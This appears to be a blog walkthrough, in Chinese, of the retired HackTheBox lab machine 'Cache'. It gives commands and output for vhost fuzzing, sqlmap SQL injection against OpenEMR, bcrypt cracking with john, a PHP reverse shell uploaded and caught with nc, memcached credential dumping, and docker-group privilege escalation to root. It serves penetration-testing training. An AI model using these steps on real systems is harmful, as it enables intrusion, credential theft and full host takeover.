文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2020-05-28   2k

HTB::Cache Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • cewl
  • wfuzz
  • sqlmap
  • openEMR exploit
  • memcached exploit
  • docker priv

0x03 Pentesting

Initial Enumeration

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds

80端口

主页没有什么有效信息,尝试暴力破解:

页面加载了functionality.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$(function(){

var error_correctPassword = false;
var error_username = false;

function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != '[email protected]_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();


if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});

});

有登录名和密码ash:[email protected]_fun,成功登录之后也没有可以利用的点,再查看Author页面:

实在是没啥思路,去HTB forum私聊一下各位大佬,提示我用cewl工具提取Autor page’s information,以及FUZZ HOST。

后来才知道用这个页面的单词和cewl工具生成一个包含域名的字典:

1
2
3
# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)

用wfuzz查找域名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# kali @ kali in ~/HackTheBox/Cache [16:52:57] 
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000037: 302 0 L 0 W 0 Ch "HMS"

Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620

–hc 404 --hh 8193 这两个参数是为了限制一些无效的返回消息。

HMS.htb加入到/etc/hosts文件中。

HMS.htb

弱口令无效,查找有没有公开的利用方式:

发现已经有很多不同版本的exploit,再尝试用OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution,运行之后提示要系统的账号和密码。Google OpenEMR,在YouTube上看到了一个SQL注入的相关漏洞。

https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s

根据视频的步骤,首先访问http://hms.htb/portal

点击Register后访问http://hms.htb/portal/add_edit_event_user.php,这里的eid参数存在SQL注入:

用burp拦截请求,并且把请求数据保存到req.txt

1
2
3
4
5
6
7
8
9
10
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

dump database

用sqlmap爆破数据库:

1
2
3
4
5
6
7
8
9
$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

然后接着就是sqlmap一把梭,找到users_secure数据表,查看usernamepassword字段,dump

1
2
3
4
5
6
7
8
9
[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username | password |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

用john爆破hash密码:

1
2
3
4
5
6
7
8
9
10
11
# kali @ kali in ~/HackTheBox/Cache [12:11:02] 
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到登录用户名和密码:openemr_admin:xxxxxx

upload reverse shell

通过Administration->Files模块上传reverse shell,写入letter_templates/custom_pdf.php文件中:

本机监听4444端口,浏览器访问http://hms.htb/sites/default/letter_templates/custom_pdf.php

1
2
3
4
5
6
7
8
$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
<.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

functionality.js中的登录凭证切换ash用户:

1
2
3
4
5
6
7
8
9
[email protected]:/var/www$ su ash
su ash
Password: [email protected]_fun
[email protected]:/var/www$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
[email protected]:~$ cat user.txt
cat user.txt
93bf------------------------8dfe

memcached exploit

查看本地运行服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
[email protected]:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -

11211端口是运行memcached服务,利用方式:

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

https://niiconsulting.com/checkmate/2013/05/memcache-exploit/

fetch the slab statistics:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
[email protected]:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END

通过slab id查看组织结构items:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END

dump all the keys:

1
2
3
4
5
6
7
8
stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

读取userpasswd

1
2
3
4
5
6
7
8
9
10
get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

SSH登录:

1
2
3
4
5
6
7
8
$ ssh [email protected]
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
[email protected]'s password:
[email protected]:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

观察到luffy是属于docker用户组。

Getting Root Access

GTFObins docker

查看docker镜像

1
2
3
[email protected]:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB

照着GTFObins给的方法进行提权:

1
2
3
4
5
6
[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# cd
[email protected]:~# cat root.txt
32fc------------------------ceab

0x04 Reference

Topic Url
OpenEmr Vulnerability ( video) https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s
Memecache https://www.hackingarticles.in/penetration-testing-on-memcached-server/
Memcacahe https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Docker https://gtfobins.github.io/gtfobins/docker/
Copyright © ca01h 2019-2021 | 本站总访问量